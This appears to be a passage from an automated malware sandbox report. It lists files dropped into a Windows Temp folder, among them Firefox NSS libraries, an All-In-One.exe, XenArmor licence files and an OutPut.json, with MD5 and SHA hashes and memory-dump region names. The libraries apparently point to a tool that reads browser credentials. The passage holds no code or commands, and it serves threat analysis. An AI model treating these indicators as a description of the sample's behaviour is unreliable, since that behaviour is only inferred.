SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-utility-l1-1-0.dll

MD5 b52a0ca52c9c207874639b62b6082242
SHA1 6fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256 a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SHA512 18834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\freebl3.dll

MD5 04a2ba08eb17206b7426cb941f39250b
SHA1 731ac2b533724d9f540759d84b3e36910278edba
SHA256 8e5110ce03826f680f30013985be49ebd8fc672de113fc1d9a566eced149b8c4
SHA512 e6e90b4becf472b2e8f716dbb962cd7de61676fcce342c735fccdc01268b5a221139bc9be0e0c9722e9978aefaae79c10bc49c43392aa05dd12244b3147aeffc

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\mozglue.dll

MD5 591533ca4655646981f759d95f75ae3d
SHA1 b4a02f18e505a1273f7090a9d246bc953a2cb792
SHA256 4434f4223d24fb6e2f5840dd6c1eedef2875e11abe24e4b0e9bc1507f8f6fd47
SHA512 915b124ad595ee78feab8f3c9be7e80155445e58ed4c88b89665df5fb7e0a04e973374a01f97bb67aaa733a8ce2e91a9f92605ec96251906e0fb2750a719b579

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\nss3.dll

MD5 fc57d044bfd635997415c5f655b5fffa
SHA1 1b5162443d985648ef64e4aab42089ad4c25f856
SHA256 17f8c55eba797bbc80c8c32ca1a3a7588415984386be56f4b4cdefd4176fb4c3
SHA512 f5a944230000730bc0aad10e6607e3389d9d82a0a4ab1b72a19d32e94e8572789d46fb4acd75ad48f17e2bbc27389d432086696f2ccc899850ff9177d6823efb

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\softokn3.dll

MD5 1b304dad157edc24e397629c0b688a3e
SHA1 ae151af384675125dfbdc96147094cff7179b7da
SHA256 8f0c9ac7134773d11d402e49daa90958fe00205e83a7389f7a58da03892d20cb
SHA512 2dc625dbdf2aae4ade600cca688eb5280200e8d7c2dfc359590435afe0926b3a7446cc56a66023ee834366132a68ae68da51a5079e4f107201e2050f5c5512ad

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

C:\Users\Admin\AppData\Local\Temp\All-In-One.exe

MD5 a48e3197ab0f64c4684f0828f742165c
SHA1 f935c3d6f9601c795f2211e34b3778fad14442b4
SHA256 baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb
SHA512 e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59

C:\Users\Admin\AppData\Local\Temp\settings.db

MD5 56b941f65d270f2bf397be196fcf4406
SHA1 244f2e964da92f7ef7f809e5ce0b3191aeab084a
SHA256 00c020ba1cce022364976f164c575993cb3b811c61b5b4e05a8a0c3d1b560c0c
SHA512 52ad8c7ed497a5b8eed565b3abcbf544841f3c8c9ec3ca8f686846a2afd15ac4ac8b16abf1cb14aeca1a2fb31f3086ad17206ec4af28e77bae600dca15e8deab

C:\Users\Admin\AppData\Local\Temp\License.XenArmor

MD5 774a9a7b72f7ed97905076523bdfe603
SHA1 946355308d2224694e0957f4ebf6cdba58327370
SHA256 76e56835b1ac5d7a8409b7333826a2353401cf67f3bd95c733adc6aa8d9fec81
SHA512 c5c77c6827c72901494b3a368593cb9a990451664b082761294a845c0cd9441d37e5e9ac0e82155cb4d97f29507ffc8e26d6ff74009666c3075578aa18b28675

C:\Users\Admin\AppData\Local\Temp\XenManager.dll

MD5 7a5c53a889c4bf3f773f90b85af5449e
SHA1 25b2928c310b3068b629e9dca38c7f10f6adc5b6
SHA256 baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c
SHA512 f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

memory/4612-244-0x0000020FF4A90000-0x0000020FF4AA6000-memory.dmp

memory/1188-256-0x0000000000550000-0x0000000000560000-memory.dmp

memory/1188-263-0x0000000004DE0000-0x0000000004E72000-memory.dmp

memory/1188-264-0x0000000004E80000-0x0000000004F1C000-memory.dmp

memory/1188-265-0x00000000054D0000-0x0000000005A74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OutPut.json

MD5 f6ce70d5466fe074a3b419543ff95d8b
SHA1 915d6dc9ca2686d63979e77adc43d71c9678e534
SHA256 6a509971a9cc11490946cb7b33864da43cd3af9f25673c130fc3bab5c365ff29
SHA512 93e83de5d0a96cd71dcfb8f9ab3b32ed2afaa388a77ac450dd7fdca11dcf2ff0d59db54107c936859d6df3b6d28630b2e9907e0b546e8b27336b684bcbed84f8

memory/1188-294-0x0000000005120000-0x0000000005186000-memory.dmp

memory/3372-295-0x0000000002E70000-0x0000000002EA6000-memory.dmp

memory/3372-296-0x0000000005530000-0x0000000005B58000-memory.dmp

memory/3372-297-0x00000000054B0000-0x00000000054D2000-memory.dmp

memory/3372-298-0x0000000005CD0000-0x0000000005D36000-memory.dmp

memory/3372-308-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0cb52ecad11458881d7edfc499c4053
SHA1 eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b
SHA256 c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b
SHA512 8a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467

memory/3372-310-0x0000000006450000-0x000000000646E000-memory.dmp

memory/3372-311-0x0000000006490000-0x00000000064DC000-memory.dmp